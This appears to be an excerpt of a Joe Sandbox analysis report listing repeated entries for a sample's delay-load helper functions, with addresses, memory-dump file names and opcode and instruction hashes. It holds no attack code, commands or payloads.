                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e4c23f6ab0c11c315a5071805f864872c5761585ba935b006a2c04778f5c8294
                                                            • Instruction ID: 2c3c05445eea42fd42fd167ef4bdd2c47391b64f1ea07507ac3c954259e801f6
                                                            • Opcode Fuzzy Hash: e4c23f6ab0c11c315a5071805f864872c5761585ba935b006a2c04778f5c8294
                                                            • Instruction Fuzzy Hash: 36A002A655D543FC75545251AD06C7F022CC7C4F523308D3EF916840959D4858595435
                                                            Function 0005F289 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9b1e0c2b13ce0b09620a1c1d66dbea091486ecdba90c7bc03d929930228ae1f8
                                                            • Instruction ID: 2c3c05445eea42fd42fd167ef4bdd2c47391b64f1ea07507ac3c954259e801f6
                                                            • Opcode Fuzzy Hash: 9b1e0c2b13ce0b09620a1c1d66dbea091486ecdba90c7bc03d929930228ae1f8
                                                            • Instruction Fuzzy Hash: 36A002A655D543FC75545251AD06C7F022CC7C4F523308D3EF916840959D4858595435
                                                            Function 0005F29D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 0c46e257177d7dc0cb0be17328a57793980d3010753f61194cf53f1d0e0fa868
                                                            • Instruction ID: 2c3c05445eea42fd42fd167ef4bdd2c47391b64f1ea07507ac3c954259e801f6
                                                            • Opcode Fuzzy Hash: 0c46e257177d7dc0cb0be17328a57793980d3010753f61194cf53f1d0e0fa868
                                                            • Instruction Fuzzy Hash: 36A002A655D543FC75545251AD06C7F022CC7C4F523308D3EF916840959D4858595435
                                                            Function 0005F2A7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 560c2eb7a24c6ab1cf4237ffb65df35d083a9a7abbe859dde4baf29dac0ad1e2
                                                            • Instruction ID: 2c3c05445eea42fd42fd167ef4bdd2c47391b64f1ea07507ac3c954259e801f6
                                                            • Opcode Fuzzy Hash: 560c2eb7a24c6ab1cf4237ffb65df35d083a9a7abbe859dde4baf29dac0ad1e2
                                                            • Instruction Fuzzy Hash: 36A002A655D543FC75545251AD06C7F022CC7C4F523308D3EF916840959D4858595435
                                                            Function 0005F2B1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6c2ae2a93a4ead5d2df183ff745cd5e0c9147d6c5c33170860295f5814d2db93
                                                            • Instruction ID: 2c3c05445eea42fd42fd167ef4bdd2c47391b64f1ea07507ac3c954259e801f6
                                                            • Opcode Fuzzy Hash: 6c2ae2a93a4ead5d2df183ff745cd5e0c9147d6c5c33170860295f5814d2db93
                                                            • Instruction Fuzzy Hash: 36A002A655D543FC75545251AD06C7F022CC7C4F523308D3EF916840959D4858595435
                                                            Function 0005F3C9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F3D6
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9440304916028a94b7daa198e3e99645135c657b9e24d72de7005e3e441a35fd
                                                            • Instruction ID: 4d21c3c27043c3956cf14b736698ee3b27aa42b1287a7a77ceb8f688afb77c87
                                                            • Opcode Fuzzy Hash: 9440304916028a94b7daa198e3e99645135c657b9e24d72de7005e3e441a35fd
                                                            • Instruction Fuzzy Hash: 8FA012D11D80023C310411406D02C3F011CCAC0F32330883BF810940815E484C4D4031
                                                            Function 0005F3E4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F3D6
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 350d5545684761f5f1043bb893b53e3c44b0a42ea335f673b20e72b08c03b9d1
                                                            • Instruction ID: ab03e77bdf7b7a2f3058b89e9223dd27675e136db41c7e597cd6958f315c810b
                                                            • Opcode Fuzzy Hash: 350d5545684761f5f1043bb893b53e3c44b0a42ea335f673b20e72b08c03b9d1
                                                            • Instruction Fuzzy Hash: D4A002D55DD5437C315451516D06C7F011CCAC4F723309D3BF955950915E485D4D5035
                                                            Function 0005F3EE Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F3D6
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 82f94b8fb2d10c0665e972a3a9e21ea33ed44e5c858a3afddf6a313a059db126
                                                            • Instruction ID: ab03e77bdf7b7a2f3058b89e9223dd27675e136db41c7e597cd6958f315c810b
                                                            • Opcode Fuzzy Hash: 82f94b8fb2d10c0665e972a3a9e21ea33ed44e5c858a3afddf6a313a059db126
                                                            • Instruction Fuzzy Hash: D4A002D55DD5437C315451516D06C7F011CCAC4F723309D3BF955950915E485D4D5035
                                                            Function 0005F40C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F3D6
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9485053b985274faa0dfc99bc26c7b3bb9af8642a24f54dda0a4a83b2848036e
                                                            • Instruction ID: ab03e77bdf7b7a2f3058b89e9223dd27675e136db41c7e597cd6958f315c810b
                                                            • Opcode Fuzzy Hash: 9485053b985274faa0dfc99bc26c7b3bb9af8642a24f54dda0a4a83b2848036e
                                                            • Instruction Fuzzy Hash: D4A002D55DD5437C315451516D06C7F011CCAC4F723309D3BF955950915E485D4D5035
                                                            Function 0005F416 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F3D6
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 19e52823e7984714c82e097f9b1cd437d6d49d03e841f03f423f8e436b4cd523
                                                            • Instruction ID: ab03e77bdf7b7a2f3058b89e9223dd27675e136db41c7e597cd6958f315c810b
                                                            • Opcode Fuzzy Hash: 19e52823e7984714c82e097f9b1cd437d6d49d03e841f03f423f8e436b4cd523
                                                            • Instruction Fuzzy Hash: D4A002D55DD5437C315451516D06C7F011CCAC4F723309D3BF955950915E485D4D5035
                                                            Function 0005F420 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F3D6
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 14651ca8f7342c158db7ae4026febedd2ddec72c013e217c6ba7aa8420abe670
                                                            • Instruction ID: ab03e77bdf7b7a2f3058b89e9223dd27675e136db41c7e597cd6958f315c810b
                                                            • Opcode Fuzzy Hash: 14651ca8f7342c158db7ae4026febedd2ddec72c013e217c6ba7aa8420abe670
                                                            • Instruction Fuzzy Hash: D4A002D55DD5437C315451516D06C7F011CCAC4F723309D3BF955950915E485D4D5035
                                                            Function 0005F51B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F4F9
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 94b1bbadbf6c2f376ed3da488cfd651d23cd838d19054bc5be8aa1f8774038e8
                                                            • Instruction ID: 65ad8dd8def4cf173685d6a53eed5b14481a3cc95367af5556fb510f2be4c444
                                                            • Opcode Fuzzy Hash: 94b1bbadbf6c2f376ed3da488cfd651d23cd838d19054bc5be8aa1f8774038e8
                                                            • Instruction Fuzzy Hash: CFA001A66AD553BC31586251AD06C7F022DCAC8F623308D3AF92A981D2AE88584A5976
                                                            Function 0005F52F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F4F9
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: f56d7b2cf9943c28e6977db1826774565fab77a278ca60027ef538eed6b21255
                                                            • Instruction ID: 65ad8dd8def4cf173685d6a53eed5b14481a3cc95367af5556fb510f2be4c444
                                                            • Opcode Fuzzy Hash: f56d7b2cf9943c28e6977db1826774565fab77a278ca60027ef538eed6b21255
                                                            • Instruction Fuzzy Hash: CFA001A66AD553BC31586251AD06C7F022DCAC8F623308D3AF92A981D2AE88584A5976
                                                            Function 0005F539 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F4F9
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 471b1386fc954bbcc60cf7f4968ba34d2fd110d4e6ea8b6b9f3e08567ec682db
                                                            • Instruction ID: 65ad8dd8def4cf173685d6a53eed5b14481a3cc95367af5556fb510f2be4c444
                                                            • Opcode Fuzzy Hash: 471b1386fc954bbcc60cf7f4968ba34d2fd110d4e6ea8b6b9f3e08567ec682db
                                                            • Instruction Fuzzy Hash: CFA001A66AD553BC31586251AD06C7F022DCAC8F623308D3AF92A981D2AE88584A5976
                                                            Function 0005F543 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F4F9
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 093e5995c3185ba0904cc5b9a27f7d826131438d6bed15973433a787b60e9b5b
                                                            • Instruction ID: 65ad8dd8def4cf173685d6a53eed5b14481a3cc95367af5556fb510f2be4c444
                                                            • Opcode Fuzzy Hash: 093e5995c3185ba0904cc5b9a27f7d826131438d6bed15973433a787b60e9b5b
                                                            • Instruction Fuzzy Hash: CFA001A66AD553BC31586251AD06C7F022DCAC8F623308D3AF92A981D2AE88584A5976
                                                            Function 0005F54D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F55A
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
